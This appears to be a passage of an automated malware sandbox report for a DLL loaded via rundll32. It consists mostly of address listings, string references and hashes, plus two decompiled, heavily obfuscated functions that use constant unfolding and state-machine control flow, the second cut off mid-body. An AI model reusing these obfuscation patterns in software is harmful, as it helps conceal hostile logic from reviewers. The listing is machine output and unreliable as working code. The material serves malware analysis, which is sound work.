0x100371c4
0x100371c6
0x100371c6
0x100371cc
0x100371d2
0x100371d4
0x100371e0
0x100371e6
0x100371d6
0x100371d6
0x100371d8
0x100371d8
0x100371ec
0x100371ee
0x100371f0
0x100371f0
0x100371f6
0x100371f8
0x100371fa
0x10037200
0x10037202
0x10037303
0x10037303
0x10037309
0x1003730e
0x1003730e
0x10037311
0x10037312
0x00000000
0x10037208
0x10037208
0x10037208
0x1003720c
0x1003722c
0x1003722e
0x10037230
0x10037236
0x1003723c
0x1003723e
0x100372e5
0x100372e5
0x100372e8
0x00000000
0x100372ee
0x100372ee
0x100372f4
0x00000000
0x100372f4
0x10037244
0x10037244
0x10037244
0x10037247
0x00000000
0x00000000
0x10037249
0x1003724b
0x10037253
0x1003725c
0x1003725c
0x1003725e
0x1003725e
0x10037270
0x10037273
0x10037279
0x10037282
0x10037285
0x10037292
0x10037295
0x10037296
0x10037297
0x1003729d
0x1003729f
0x100372a5
0x100372ab
0x00000000
0x00000000
0x00000000
0x00000000
0x100372ad
0x100372ad
0x100372ad
0x100372af
0x00000000
0x00000000
0x100372b1
0x100372b4
0x100373d7
0x100373d7
0x00000000
0x100372ba
0x100372ba
0x100372bc
0x100372be
0x100372be
0x100372be
0x100372c6
0x100372c9
0x100372c9
0x100372cf
0x100372d1
0x100372d3
0x100372da
0x100372e0
0x100372e2
0x00000000
0x100372e2
0x00000000
0x100372b4
0x00000000
0x100372ad
0x00000000
0x10037244
0x1003720e
0x1003720e
0x10037210
0x10037216
0x1003721e
0x1003721e
0x10037221
0x10037221
0x00000000
0x10037210
0x00000000
0x100372fa
0x100372fa
0x100372fb
0x100372fb
0x00000000
0x10037208
0x100370d7
0x100370dd
0x100370e2
0x100370ed
0x100370f4
0x100370fa
0x10037101
0x10037102
0x10037103
0x10037108
0x1003710e
0x10037111
0x10037113
0x1003712d
0x1003712f
0x00000000
0x10037135
0x10037135
0x1003713c
0x00000000
0x10037142
0x10037148
0x1003714e
0x10037150
0x10037150
0x10037152
0x10037152
0x1003715b
0x10037162
0x10037168
0x1003716b
0x1003716c
0x1003716e
0x1003716e
0x10037176
0x10037178
0x00000000
0x1003717e
0x1003717e
0x10037184
0x10037187
0x100373dc
0x100373de
0x100373df
0x100373e5
0x100373f1
0x100373f8
0x100373f9
0x100373fa
0x100373ff
0x10037402
0x1003718d
0x1003718d
0x10037194
0x00000000
0x10037194
0x10037187
0x10037178
0x1003713c
0x10037115
0x10037115
0x1003711b
0x10037121
0x10037122
0x10037318
0x10037318
0x1003731f
0x10037320
0x10037321
0x10037326
0x10037329
0x10037329
0x10037329
0x10037113
0x10036fff
0x10036fff
0x10037005
0x10037007
0x1003703f
0x10037041
0x00000000
0x10037043
0x10037043
0x1003704a
0x00000000
0x1003704c
0x10037052
0x10037054
0x1003705a
0x1003705a
0x1003705c
0x1003705c
0x1003705e
0x10037067
0x1003706e
0x10037071
0x10037072
0x10037074
0x10037074
0x1003707c
0x1003707e
0x00000000
0x10037080
0x10037080
0x10037086
0x10037089
0x1003709c
0x1003709d
0x100370a3
0x100370af
0x100370b6
0x100370bb
0x100370bc
0x100370c1
0x100370c4
0x00000000
0x1003708b
0x1003708b
0x10037092
0x00000000
0x10037092
0x10037089
0x1003707e
0x1003704a
0x00000000
0x10037009
0x10037009
0x1003700b
0x1003700c
0x10037012
0x1003701e
0x10037025
0x1003702a
0x1003702b
0x10037030
0x10037033
0x10037033
0x10037033
0x10037035
0x10037035
0x10037035
0x1003732b
0x1003732b
0x1003732d
0x10037409
0x10037410
0x10037417
0x1003742a
0x10037430
0x10037431
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10037333
0x10037339
0x10037339
0x1003733f
0x1003733f
0x1003734b
0x00000000
0x1003734b
0x10036a92
0x10036a92
0x10036a94
0x10036a9a
0x10036a9c
0x10036aa2
0x10036aa4
0x10036e84
0x10036e84
0x10036e86
0x10036e8c
0x10036e93
0x10036e99
0x10036e9b
0x10036eff
0x10036f01
0x10036f07
0x10036f0d
0x10036f0f
0x10036f15
0x10036f1c
0x10036f1c
0x10036f1e
0x10036f1e
0x10036f2b
0x10036f32
0x10036f38
0x10036f3b
0x10036f3c
0x10036f42
0x10036f42
0x10036f46
0x10036f48
0x10036f4e
0x10036f54
0x10036f57
0x00000000
0x10036f5d
0x10036f5d
0x10036f64
0x10036f64
0x10036f57
0x10036f48
0x10036f0f
0x10036e9d
0x10036e9d
0x10036e9f
0x10036ea5
0x10036eab
0x00000000
0x10036eab
0x10036e9b
0x10036aaa
0x10036aaa
0x10036aaa
0x10036aad
0x10036ab1
0x10036ab1
0x10036ab2
0x10036ac4
0x10036ad1
0x10036ae0
0x10036b0a
0x10036b0f
0x10036b15
0x10036b18
0x10036b1a
0x10036bec
0x10036bf2
0x10036cd6
0x10036cdc
0x10036ce2
0x10036ce2
0x10036ce2
0x10036ce5
0x10036ce7
0x10036ce7
0x10036ced
0x10036cf3
0x10036cf9
0x10036cfb
0x10036cfd
0x10036cfd
0x10036d03
0x10036d09
0x10036d0b
0x10036d17
0x10036d1d
0x10036d0d
0x10036d0d
0x10036d0f
0x10036d0f
0x10036d23
0x10036d25
0x10036d27
0x10036d27
0x10036d2d
0x10036d2f
0x10036d31
0x10036d37
0x10036d39
0x10036e3a
0x10036e3a
0x10036e40
0x10036e45
0x10036e45
0x10036e48
0x10036e49
0x00000000
0x10036d3f
0x10036d3f
0x10036d3f
0x10036d43
0x10036d63
0x10036d65
0x10036d67
0x10036d6d
0x10036d73
0x10036d75
0x10036e1c
0x10036e1c
0x10036e1f
0x00000000
0x10036e25
0x10036e25
0x10036e2b
0x00000000
0x10036e2b
0x10036d7b
0x10036d7b
0x10036d7b
0x10036d7e
0x00000000
0x00000000
0x10036d80
0x10036d82
0x10036d8a
0x10036d93
0x10036d93
0x10036d95
0x10036d95
0x10036da7
0x10036daa
0x10036db0
0x10036db9
0x10036dbc
0x10036dc9
0x10036dcc
0x10036dcd
0x10036dce
0x10036dd4
0x10036dd6
0x10036ddc
0x10036de2
0x00000000
0x00000000
0x00000000
0x00000000
0x10036de4
0x10036de4
0x10036de4
0x10036de6
0x00000000
0x00000000
0x10036de8
0x10036deb
0x10036eae
0x10036eae
0x10036eb0
0x10036eb5
0x10036ebb
0x10036ec1
0x10036ec2
0x00000000
0x10036df1
0x10036df1
0x10036df3
0x10036df5
0x10036df5
0x10036df5
0x10036dfd
0x10036e00
0x10036e00
0x10036e06
0x10036e08
0x10036e0a
0x10036e11
0x10036e17
0x10036e19
0x00000000
0x10036e19
0x00000000
0x10036deb
0x00000000
0x10036de4
0x00000000
0x10036d7b
0x10036d45
0x10036d45
0x10036d47
0x10036d4d
0x10036d55
0x10036d55
0x10036d58
0x10036d58
0x00000000
0x10036d47
0x00000000
0x10036e31
0x10036e31
0x10036e32
0x10036e32
0x00000000
0x10036d3f
0x10036bf8
0x10036bfe
0x10036c03
0x10036c0e
0x10036c15
0x10036c1b
0x10036c22
0x10036c23
0x10036c24
0x10036c29
0x10036c2f
0x10036c32
0x10036c34
0x10036c4e
0x10036c50
0x00000000
0x10036c56
0x10036c56
0x10036c5d
0x00000000
0x10036c63
0x10036c69
0x10036c6f
0x10036c71
0x10036c71
0x10036c73
0x10036c73
0x10036c7c
0x10036c83
0x10036c89
0x10036c8c
0x10036c8d
0x10036c8f
0x10036c8f
0x10036c97
0x10036c99
0x00000000
0x10036c9f
0x10036c9f
0x10036ca5
0x10036ca8
0x10036cbe
0x10036cc4
0x10036cca
0x10036ccb
0x10036ec8
0x10036ec8
0x10036ecf
0x10036ed0
0x10036ed1
0x10036ed6
0x10036ed9
0x10036caa
0x10036caa
0x10036cb1
0x00000000
0x10036cb1
0x10036ca8
0x10036c99
0x10036c5d
0x10036c36
0x10036c36
0x10036c3c
0x10036c42
0x10036c43
0x10036e4f
0x10036e4f
0x10036e56
0x10036e57
0x10036e58
0x10036e5d
0x10036e60
0x10036e60
0x10036e60
0x10036c34
0x10036b20
0x10036b20
0x10036b26
0x10036b28
0x10036b60
0x10036b62
0x00000000
0x10036b64
0x10036b64
0x10036b6b
0x00000000
0x10036b6d
0x10036b73
0x10036b75
0x10036b7b
0x10036b7b
0x10036b7d
0x10036b7d
0x10036b7f
0x10036b88
0x10036b8f
0x10036b92
0x10036b93
0x10036b95
0x10036b95
0x10036b9d
0x10036b9f
0x00000000
0x10036ba1
0x10036ba1
0x10036ba7
0x10036baa
0x10036bbd
0x10036bbe
0x10036bc4
0x10036bd0
0x10036bd7
0x10036bdc
0x10036bdd
0x10036be2
0x10036be5
0x00000000
0x10036bac
0x10036bac
0x10036bb3
0x00000000
0x10036bb3
0x10036baa
0x10036b9f
0x10036b6b
0x00000000
0x10036b2a
0x10036b2a
0x10036b2c
0x10036b2d
0x10036b33
0x10036b3f
0x10036b46
0x10036b4b
0x10036b4c
0x10036b51
0x10036b54
0x10036b54
0x10036b54
0x10036b56
0x10036b56
0x10036b56
0x10036e62
0x10036e62
0x10036e64
0x10036edd
0x10036ee4
0x10036ee4
0x10036ee4
0x10036eeb
0x10036eed
0x10036ef3
0x10036ef4
0x10037437
0x10037437
0x10037438
0x10037439
0x1003743e
0x00000000
0x00000000
0x00000000
0x00000000
0x10036e66
0x10036e6c
0x10036e6c
0x10036e72
0x10036e72
0x10036e7e
0x00000000
0x10036e7e
0x10036aa4
0x10037441
0x10037441
0x10037447
0x1003744d
0x10037453
0x10037455
0x10037457
0x1003745e
0x1003745e
0x10037460
0x10037460
0x10037469
0x1003746a
0x10037472
0x10037479
0x1003747c
0x1003747d
0x10037483
0x10037483
0x10037487
0x1003748d
0x1003748f
0x10037491
0x10037497
0x1003749a
0x100374ab
0x100374ad
0x100374ae
0x100374b4
0x100374c0
0x100374c7
0x100374c8
0x100374c9
0x100374ce
0x1003749c
0x1003749c
0x100374a3
0x100374a3
0x1003749a
0x1003748f
0x100374df
0x100374e6
0x100374ee
0x100374ef
0x100374f1
0x1003763d
0x1003763f
0x1003764f
0x10037652
0x10037654
0x00000000
0x10037641
0x10037647
0x00000000
0x10037647
0x00000000
0x100374f7
0x100374f7
0x100374fd
0x10037500
0x10037506
0x10037509
0x1003750f
0x10037515
0x10037517
0x10037519
0x1003751b
0x1003751b
0x1003751d
0x1003751d
0x1003752a
0x10037531
0x10037534
0x10037535
0x10037537
0x10037538
0x10037538
0x10037540
0x10037546
0x10037548
0x1003754e
0x10037550
0x10037556
0x10037559
0x10037614
0x10037615
0x1003761b
0x10037627
0x1003762e
0x1003762f
0x10037630
0x10037635
0x1003755f
0x10037565
0x1003756c
0x1003756c
0x1003756c
0x1003756c
0x10037559
0x10037572
0x10037572
0x10037578
0x10037578
0x10037578
0x1003757e
0x10037584
0x10037587
0x1003758d
0x1003758f
0x10037591
0x10037597
0x10037599
0x10037599
0x10037599
0x10037597
0x1003759e
0x1003759f
0x100375a1
0x100375a3
0x100375a3
0x100375a5
0x100375a7
0x100375ad
0x100375af
0x100375b5
0x100375b5
0x100375bb
0x100375bd
0x00000000
0x00000000
0x100375c3
0x100375c5
0x100375c7
0x100375c7
0x100375c9
0x100375c9
0x100375d9
0x100375e0
0x100375e3
0x100375e4
0x100375e6
0x100375e6
0x100375ea
0x100375f0
0x100375f2
0x100375f8
0x100375fe
0x10037601
0x1003765f
0x10037661
0x10037662
0x10037668
0x10037674
0x1003767b
0x1003767c
0x1003767d
0x10037682
0x10037603
0x10037603
0x1003760a
0x1003760a
0x10037601
0x10037693
0x10037698
0x100376a7
0x100376aa
0x100376b4
0x100376b4
0x100376b6
0x100376b8
0x100376be
0x100376c6
0x100376cc
0x100376ce
0x100376d4
0x100376d6
0x100376e3
0x100376d8
0x100376d8
0x100376df
0x100376df
0x100376e6
0x100376ec
0x100376ed
0x100376f3
0x100376f3
0x100376f8
0x100376fb
0x100376ff
0x100376ff
0x10037700
0x10037702
0x10037708
0x1003770e
0x00000000
0x00000000
0x00000000
0x1003770e
0x100375b5
0x10037714
0x10037716
0x10037719
0x1003771b
0x1003771e
0x10037724
0x00000000
0x10037724
0x100363ba
0x100363b1
0x100363a8
0x1003633d
0x10036342
0x1003634a
0x1003635e
0x10036363
0x10036367
0x10036367
0x1003636a
0x1003637a
0x10037789
0x1003778b
0x1003778c
0x1003778d
0x1003778e
0x1003778f
0x10037790
0x10037795
0x10037798
0x1003779b
0x1003779c
0x1003779f
0x100377a1
0x100377a7
0x100377aa
0x100377ac
0x100377c1
0x100377c2
0x100377c5
0x100377c7
0x100377dd
0x100377e3
0x100377eb
0x100377ed
0x100377f8
0x100377fb
0x10037812
0x100377fd
0x100377fd
0x10037802
0x00000000
0x10037802
0x100377ef
0x100377ef
0x100377f4
0x10037804
0x10037804
0x10037805
0x10037807
0x1003780c
0x1003780c
0x100377c9
0x100377c9
0x100377cc
0x00000000
0x100377ce
0x100377d1
0x100377d9
0x100377d9
0x100377cc
0x100377ae
0x100377ae
0x100377b5
0x100377b6
0x100377b8
0x100377bd
0x100377bd
0x100377a3
0x100377a3
0x100377a3
0x10037816
0x10036380
0x10037762
0x10037762
0x1003776b
0x10037774
0x10037779
0x10037788
0x10037788
0x00000000
0x00000000
0x00000000
0x1003634a

APIs

__floor_pentium4.LIBCMT ref: 1003644B

Strings

1#INF, xrefs: 10037746
1#IND, xrefs: 10037728
1#QNAN, xrefs: 1003773C
1#SNAN, xrefs: 10037732

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: bbceed1c2936b7684a965e352f22890cd8bf915d81af51421f0a700764367250
Instruction ID: a3cbde3b429370e976e6b7797652e40458841655e88b9989e52ada4887f9fce3
Opcode Fuzzy Hash: bbceed1c2936b7684a965e352f22890cd8bf915d81af51421f0a700764367250
Instruction Fuzzy Hash: 00D21571E086298FDB66CE28CD407DAB7F5FB49346F1541EAD80DEA240E774AE818F41

Uniqueness

Uniqueness Score: -1.00%

Function 00B3A0AF, Relevance: 9.0, Strings: 7, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B3A0AF(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t237;
				void* _t251;
				void* _t256;
				short _t257;
				void* _t258;
				void* _t262;
				signed int _t268;
				signed int _t269;
				void* _t271;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				intOrPtr _t319;
				signed int _t320;
				signed int _t323;
				signed int* _t325;
				void* _t327;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t237);
				_v8 = _v8 & 0x00000000;
				_t325 =  &(( &_v108)[4]);
				_v36 = 0x3ea4;
				_v36 = _v36 >> 7;
				_t271 = 0x1d995f52;
				_v36 = _v36 ^ 0x0000fd94;
				_v100 = 0xb5d8;
				_t313 = 0x12;
				_v100 = _v100 / _t313;
				_v100 = _v100 + 0xffffd667;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xffc12715;
				_v44 = 0xa7b5;
				_v44 = _v44 + 0x5ef4;
				_v44 = _v44 ^ 0x00014b95;
				_v48 = 0x9389;
				_v48 = _v48 + 0xb0ba;
				_v48 = _v48 ^ 0x000118ce;
				_v88 = 0x5fea;
				_t314 = 0x1c;
				_v88 = _v88 * 0x7c;
				_v88 = _v88 ^ 0x636ec63e;
				_v88 = _v88 ^ 0x63409d32;
				_v16 = 0x76ea;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x000ec3ec;
				_v20 = 0x91aa;
				_v20 = _v20 | 0x0edf39e6;
				_v20 = _v20 ^ 0x0edfdf8b;
				_v52 = 0xaa70;
				_v52 = _v52 + 0x8ed4;
				_v52 = _v52 ^ 0x00017b8d;
				_v104 = 0xa114;
				_v104 = _v104 >> 5;
				_v104 = _v104 << 0xc;
				_v104 = _v104 / _t314;
				_v104 = _v104 ^ 0x0002b555;
				_v108 = 0xd093;
				_v108 = _v108 << 0xa;
				_t315 = 0x69;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 / _t315;
				_v108 = _v108 ^ 0x024bf4a9;
				_v80 = 0x5298;
				_v80 = _v80 | 0xf2bddfef;
				_v80 = _v80 ^ 0xf2bdee35;
				_v84 = 0xad61;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x5376a172;
				_v84 = _v84 ^ 0x535d9bb3;
				_v96 = 0xfad4;
				_v96 = _v96 + 0xc0fb;
				_t316 = 0x75;
				_v96 = _v96 / _t316;
				_t317 = 0x41;
				_t323 = _a8;
				_v96 = _v96 / _t317;
				_v96 = _v96 ^ 0x00007e63;
				_v40 = 0x6cc;
				_v40 = _v40 + 0x5321;
				_v40 = _v40 ^ 0x00002fe7;
				_v76 = 0xe38c;
				_v76 = _v76 + 0x66b4;
				_v76 = _v76 >> 5;
				_v76 = _v76 ^ 0x00001a53;
				_v68 = 0xaffd;
				_v68 = _v68 + 0x9b0e;
				_v68 = _v68 ^ 0x74692a2f;
				_v68 = _v68 ^ 0x74685d67;
				_v92 = 0xd493;
				_v92 = _v92 >> 5;
				_v92 = _v92 + 0xffffb819;
				_v92 = _v92 << 3;
				_v92 = _v92 ^ 0xfffdea97;
				_v32 = 0x61b7;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00001b97;
				_v72 = 0x8555;
				_v72 = _v72 >> 6;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x00005e98;
				_v64 = 0xfd5d;
				_v64 = _v64 ^ 0xfb760f92;
				_v64 = _v64 + 0xe44c;
				_v64 = _v64 ^ 0xfb77c0e2;
				_v24 = 0xfd78;
				_v24 = _v24 ^ 0x534e19f9;
				_v24 = _v24 ^ 0x534eb204;
				_v28 = 0xae38;
				_v28 = _v28 ^ 0x0fcca386;
				_v28 = _v28 ^ 0x0fcc33c1;
				_t268 = _a8;
				_v56 = 0x9a6f;
				_v56 = _v56 | 0xcfdc8d68;
				_v56 = _v56 ^ 0xf237fb5d;
				_v56 = _v56 ^ 0x3deb56e2;
				_v12 = 0xde50;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x0de56132;
				_v60 = 0x8399;
				_v60 = _v60 ^ 0x95508e48;
				_v60 = _v60 ^ 0xc724022f;
				_v60 = _v60 ^ 0x52742192;
				while(1) {
					L1:
					_t251 = 0x10ef006b;
					do {
						while(1) {
							L2:
							_t327 = _t271 - 0x1d995f52;
							if(_t327 > 0) {
								break;
							}
							if(_t327 == 0) {
								_t271 = 0x1679d154;
								continue;
							} else {
								if(_t271 == 0x829cfc0) {
									_t311 = _v8;
									if(_t311 != 0) {
										do {
											_t320 =  *((intOrPtr*)(_t311 + 0x220));
											E00B2F536(_v56, _v12, _v60, _t311);
											_t311 = _t320;
										} while (_t320 != 0);
									}
								} else {
									if(_t271 == _t251) {
										_t312 = _v8;
										_t268 = 0;
										if(_t312 != 0) {
											do {
												E00B26636(_t268 * 2 + _t323, _v80, _v84, _v96, _t312 + 0xc);
												_t256 = E00B30ADC(_t312 + 0xc, _v40, _v76);
												_t325 =  &(_t325[4]);
												_t269 = _t268 + _t256;
												_t257 = 0x2c;
												 *((short*)(_t323 + _t269 * 2)) = _t257;
												_t268 = _t269 + 1;
												_t312 =  *((intOrPtr*)(_t312 + 0x220));
											} while (_t312 != 0);
											_t251 = 0x10ef006b;
										}
										_t319 = _v4;
										_t271 = 0x33a3af6e;
										_t310 = _a8;
										continue;
									} else {
										if(_t271 == 0x1679d154) {
											E00B35A61( &_v8, E00B38D1C, _v44, _v48, _v88);
											_t325 =  &(_t325[4]);
											_t271 = 0x20b4c829;
											while(1) {
												L1:
												_t251 = 0x10ef006b;
												goto L2;
											}
										} else {
											if(_t271 != 0x19514a0a) {
												goto L24;
											} else {
												_push(_t271);
												_push(_t271);
												_t323 = E00B28736(_t319 + _t319);
												_t251 = 0x10ef006b;
												_t271 =  !=  ? 0x10ef006b : 0x829cfc0;
												continue;
											}
										}
									}
								}
							}
							L28:
							return 0 |  *_a8 != 0x00000000;
						}
						if(_t271 == 0x20b4c829) {
							_t309 = _v8;
							_t319 = 0;
							_v4 = 0;
							if(_t309 != 0) {
								do {
									_t258 = E00B30ADC(_t309 + 0xc, _v16, _v20);
									_t309 =  *(_t309 + 0x220);
									_t319 = _t319 + 1 + _t258;
								} while (_t309 != 0);
								_v4 = _t319;
								_t251 = 0x10ef006b;
							}
							_t310 = _a8;
							_t271 = 0x19514a0a;
							goto L24;
						} else {
							if(_t271 == 0x2b3a1c97) {
								E00B2F536(_v64, _v24, _v28, _t323);
								_t271 = 0x829cfc0;
								goto L1;
							} else {
								if(_t271 != 0x33a3af6e) {
									goto L24;
								} else {
									_t260 = _t310 + 4;
									 *(_t310 + 4) =  *(_t310 + 4) & 0x00000000;
									_t262 = E00B35D1D(_v68, _v92, _v32, _v72, _t268 - 1, _t323, _v36, _t260);
									_t325 =  &(_t325[6]);
									 *_t310 = _t262;
									_t271 = 0x2b3a1c97;
									while(1) {
										L1:
										_t251 = 0x10ef006b;
										goto L2;
									}
								}
							}
						}
						goto L28;
						L24:
					} while (_t271 != 0x202e1177);
					goto L28;
				}
			}

0x00b3a0bd
0x00b3a0be
0x00b3a0c5
0x00b3a0c6
0x00b3a0c7
0x00b3a0cc
0x00b3a0d4
0x00b3a0d7
0x00b3a0e1
0x00b3a0e6
0x00b3a0eb
0x00b3a0f3
0x00b3a101
0x00b3a106
0x00b3a10c
0x00b3a114
0x00b3a119
0x00b3a121
0x00b3a129
0x00b3a131
0x00b3a139
0x00b3a141
0x00b3a149
0x00b3a151
0x00b3a15e
0x00b3a161
0x00b3a165
0x00b3a16d
0x00b3a175
0x00b3a17d
0x00b3a182
0x00b3a18a
0x00b3a192
0x00b3a19a
0x00b3a1a2
0x00b3a1aa
0x00b3a1b2
0x00b3a1ba
0x00b3a1c2
0x00b3a1c7
0x00b3a1d4
0x00b3a1d8
0x00b3a1e0
0x00b3a1e8
0x00b3a1f2
0x00b3a1f5
0x00b3a201
0x00b3a205
0x00b3a20d
0x00b3a215
0x00b3a21d
0x00b3a225
0x00b3a22d
0x00b3a232
0x00b3a23a
0x00b3a242
0x00b3a24a
0x00b3a256
0x00b3a259
0x00b3a265
0x00b3a268
0x00b3a26f
0x00b3a273
0x00b3a27b
0x00b3a283
0x00b3a28b
0x00b3a293
0x00b3a29b
0x00b3a2a3
0x00b3a2a8
0x00b3a2b0
0x00b3a2b8
0x00b3a2c0
0x00b3a2c8
0x00b3a2d0
0x00b3a2d8
0x00b3a2dd
0x00b3a2e5
0x00b3a2ea
0x00b3a2f2
0x00b3a2fa
0x00b3a2ff
0x00b3a307
0x00b3a30f
0x00b3a314
0x00b3a319
0x00b3a321
0x00b3a329
0x00b3a331
0x00b3a339
0x00b3a341
0x00b3a349
0x00b3a351
0x00b3a359
0x00b3a361
0x00b3a369
0x00b3a371
0x00b3a37c
0x00b3a384
0x00b3a38c
0x00b3a394
0x00b3a39c
0x00b3a3a4
0x00b3a3a9
0x00b3a3b1
0x00b3a3b9
0x00b3a3c1
0x00b3a3c9
0x00b3a3d1
0x00b3a3d1
0x00b3a3d1
0x00b3a3d6
0x00b3a3d6
0x00b3a3d6
0x00b3a3d6
0x00b3a3dc
0x00000000
0x00000000
0x00b3a3e2
0x00b3a4cb
0x00000000
0x00b3a3e8
0x00b3a3ee
0x00b3a592
0x00b3a598
0x00b3a59a
0x00b3a59a
0x00b3a5ad
0x00b3a5b2
0x00b3a5b6
0x00b3a59a
0x00b3a3f4
0x00b3a3f6
0x00b3a462
0x00b3a466
0x00b3a46a
0x00b3a46c
0x00b3a485
0x00b3a494
0x00b3a499
0x00b3a49c
0x00b3a4a0
0x00b3a4a1
0x00b3a4a6
0x00b3a4a7
0x00b3a4ad
0x00b3a4b1
0x00b3a4b1
0x00b3a4b6
0x00b3a4ba
0x00b3a4bf
0x00000000
0x00b3a3f8
0x00b3a3fe
0x00b3a450
0x00b3a455
0x00b3a458
0x00b3a3d1
0x00b3a3d1
0x00b3a3d1
0x00000000
0x00b3a3d1
0x00b3a400
0x00b3a406
0x00000000
0x00b3a40c
0x00b3a418
0x00b3a419
0x00b3a423
0x00b3a425
0x00b3a432
0x00000000
0x00b3a432
0x00b3a406
0x00b3a3fe
0x00b3a3f6
0x00b3a3ee
0x00b3a5ba
0x00b3a5cf
0x00b3a5cf
0x00b3a4db
0x00b3a543
0x00b3a547
0x00b3a549
0x00b3a54f
0x00b3a551
0x00b3a55c
0x00b3a561
0x00b3a568
0x00b3a56b
0x00b3a56f
0x00b3a573
0x00b3a573
0x00b3a578
0x00b3a57f
0x00000000
0x00b3a4dd
0x00b3a4e3
0x00b3a532
0x00b3a539
0x00000000
0x00b3a4e5
0x00b3a4eb
0x00000000
0x00b3a4f1
0x00b3a4f1
0x00b3a4f4
0x00b3a511
0x00b3a516
0x00b3a519
0x00b3a51b
0x00b3a3d1
0x00b3a3d1
0x00b3a3d1
0x00000000
0x00b3a3d1
0x00b3a3d1
0x00b3a4eb
0x00b3a4e3
0x00000000
0x00b3a584
0x00b3a584
0x00000000
0x00b3a590

Strings

c~, xrefs: 00B3A273
/, xrefs: 00B3A28B
V=, xrefs: 00B3A394
g]ht, xrefs: 00B3A2C8
_, xrefs: 00B3A151
L, xrefs: 00B3A331
2a, xrefs: 00B3A3A9

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2a$L$c~$g]ht$/$V=$_
API String ID: 0-445983283
Opcode ID: a12c499f03e53f0e2c7bd42ea7a2bbaff9aa265c2f387c26e7b2451b972ea0ed
Instruction ID: ea0aacfd97ef9da7f2361277f1cee59ce91a869d08972e5612c97ac1dcd2ba93
Opcode Fuzzy Hash: a12c499f03e53f0e2c7bd42ea7a2bbaff9aa265c2f387c26e7b2451b972ea0ed
Instruction Fuzzy Hash: D3D151725087819FD368CF65D48991BBBE2FBD4758F60890CF5D6862A0C7B89909CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00B37F1F, Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B37F1F(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t229;
				void* _t232;
				void* _t233;
				void* _t236;
				void* _t238;
				void* _t241;
				void* _t246;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t271;
				void* _t272;
				signed int* _t274;
				void* _t277;

				_t274 =  &_v104;
				_v16 = 0x432510;
				_v12 = 0x57033b;
				_v8 = 0x70a374;
				_t271 = 0;
				_t247 = __ecx;
				_v4 = 0;
				_t272 = 0x285a15;
				_v52 = 0x28a8;
				_v52 = _v52 << 0xb;
				_t249 = 0x64;
				_v52 = _v52 / _t249;
				_v52 = _v52 ^ 0x00032641;
				_v56 = 0x58c1;
				_v56 = _v56 ^ 0x08ae2152;
				_v56 = _v56 ^ 0xe42bbac7;
				_v56 = _v56 ^ 0xec85f018;
				_v60 = 0x32b9;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x4ab7c61f;
				_v60 = _v60 ^ 0x4ab7bf69;
				_v88 = 0xcc29;
				_v88 = _v88 << 7;
				_v88 = _v88 >> 0xe;
				_t250 = 0x27;
				_v88 = _v88 * 0x71;
				_v88 = _v88 ^ 0x00008073;
				_v28 = 0x82bf;
				_v28 = _v28 / _t250;
				_v28 = _v28 ^ 0x0000421a;
				_v80 = 0xde89;
				_v80 = _v80 | 0x25f7ab60;
				_v80 = _v80 + 0xffffb767;
				_v80 = _v80 ^ 0x25f7d2d5;
				_v84 = 0xb172;
				_v84 = _v84 | 0x58f01ffb;
				_v84 = _v84 ^ 0x6aa9a845;
				_v84 = _v84 | 0x8208c103;
				_v84 = _v84 ^ 0xb259d8d2;
				_v48 = 0xe27e;
